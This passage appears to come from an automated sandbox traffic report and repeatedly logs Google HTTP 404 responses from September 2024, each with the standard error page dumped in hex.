70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 